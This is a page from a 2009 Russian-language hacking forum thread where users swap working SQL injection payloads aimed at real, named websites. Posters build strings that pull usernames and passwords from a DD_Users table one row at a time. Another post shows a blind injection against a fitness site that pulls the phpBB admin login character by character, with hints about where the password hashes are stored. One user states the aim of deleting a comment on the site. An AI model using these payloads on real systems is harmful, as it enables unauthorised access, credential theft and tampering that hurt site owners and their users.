HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 534 из 2438 « Первая < 34434484524 530 531 532 533 534 535 536 537 538 54458463410341534 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #5331  
Старый 06.02.2009, 18:29
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию
$p01nt,
http://www.site.ru/index.php?id=1+or+1=(SELECT+TOP+1+cast(USERNAME+as +nvarchar)%2B%27%3A%27%2Bcast(USERPASSWORD+as+ nvarchar)+from+DD_Users)--
Это выведит даные из USERNAME и USERPASSWORD
А на счет перебора, я хз...возможно там только один юзер...
 
Ответить с цитированием

  #5332  
Старый 06.02.2009, 18:32
$p01nt
Участник форума
Регистрация: 19.02.2008
Сообщений: 186
Провел на форуме:
584540

Репутация: 96
По умолчанию
Дык я уже написал вывод, нужен именно перебор!! Там 100% 860 юзеров
Как же все таки перебрать?
 
Ответить с цитированием

  #5333  
Старый 06.02.2009, 18:33
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию
select username from dd_users where username not in (select top 1(2,3,..,n) username from dd_users)
 
Ответить с цитированием

  #5334  
Старый 06.02.2009, 18:45
$p01nt
Участник форума
Регистрация: 19.02.2008
Сообщений: 186
Провел на форуме:
584540

Репутация: 96
По умолчанию
l1ght, обьясни пожалуйста команду и если можно на моем примере.
 
Ответить с цитированием

  #5335  
Старый 06.02.2009, 18:51
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию
2
Цитата:
1+or+1=(select top 1 convert(char,username%2b';'%2buserpassword) from dd_users where username not in (select top 1 username from dd_users))
3
Цитата:
1+or+1=(select top 1 convert(char,username%2b';'%2buserpassword) from dd_users where username not in (select top 2 username from dd_users))
4
Цитата:
1+or+1=(select top 1 convert(char,username%2b';'%2buserpassword) from dd_users where username not in (select top 3 username from dd_users))
and so on

/add Велемир, если про:
Цитата:
но работают условия типа 1+and+1
Цитата:
а выражение 1%2band%2b1=1 - нет
Цитата:
.=
видимо модреврайт on)
Последний раз редактировалось l1ght; 06.02.2009 в 19:11..
 
Ответить с цитированием

  #5336  
Старый 06.02.2009, 18:52
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию
Никто не поможет чтоли ?
 
Ответить с цитированием

  #5337  
Старый 06.02.2009, 19:03
$p01nt
Участник форума
Регистрация: 19.02.2008
Сообщений: 186
Провел на форуме:
584540

Репутация: 96
По умолчанию
Сформировал запрос под свой url:
+or+1=(select Email from EmailTable where Email not in (select top 2 Email from EmailTable))--
выдает:
Microsoft OLE DB Provider for SQL Server error '80004005'

Subquery returned more than 1 value. This is not permitted when the subquery follows =, !=, <, <= , >, >= or when the subquery is used as an expression.

/xxx/xxx.asp, line 156
 
Ответить с цитированием

  #5338  
Старый 06.02.2009, 20:10
InFlame
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
Провел на форуме:
810079

Репутация: 90
По умолчанию
Возможно ли в php-инъекции как-нибудь вывести содержимое директории, а не файла?
 
Ответить с цитированием

Загадочный SQL inj
  #5339  
Старый 06.02.2009, 20:20
new_daemon
Новичок
Регистрация: 06.02.2009
Сообщений: 2
Провел на форуме:
1799

Репутация: 0
Angry Загадочный SQL inj
Вот такой SQL inj
http://www.moscowfitness.ru/find.php?cname=bebebe'

Долго не мог подобрать не одной таблицы, а потом попробовал вот так
http://www.moscowfitness.ru/find.php?cname=bebebe' UNION select 1 FROM CLUBS/*

и удивился.

Вышло следующее
Код:
select count(a.CL_ID) as total from CLUBS a where a.CL_DAY_EXPIRES >= now() and lower(a.CL_NAME) like 'bebebe' union select 1 from clubs/*%' group by a.CL_ID
MYSQL заявил, что "Table 'db10002m.clubs' doesn't exist"

Как такое может быть? Для первой части запроса таблица CLUBS есть, а для второй уже нет.
Или это так приведение к нижнему регистру влияет?

p.s. Глобальная задача найти таблицу с комментариями и удалить один из комментариев.
 
Ответить с цитированием

  #5340  
Старый 06.02.2009, 21:55
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию
Цитата:
Сообщение от new_daemon  
Как такое может быть?
Должно быть таблица clubs находится в другой бд.

http://www.moscowfitness.ru/find.php?cname=bebebe'+or+1=if(ascii(substring((se lect+username+from+phpbb_users+limit+0,1),1,1))>=6 5,1,0)/*

Если я не намудрил с запросом, то первый символ логина админа форума - 'A'. Дальше сам )

//наверно дальше будет 'dmin' ^^

Хеши лежат в колумне user_password
 
Ответить с цитированием
Ответ
Страница 534 из 2438 « Первая < 34434484524 530 531 532 533 534 535 536 537 538 54458463410341534 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ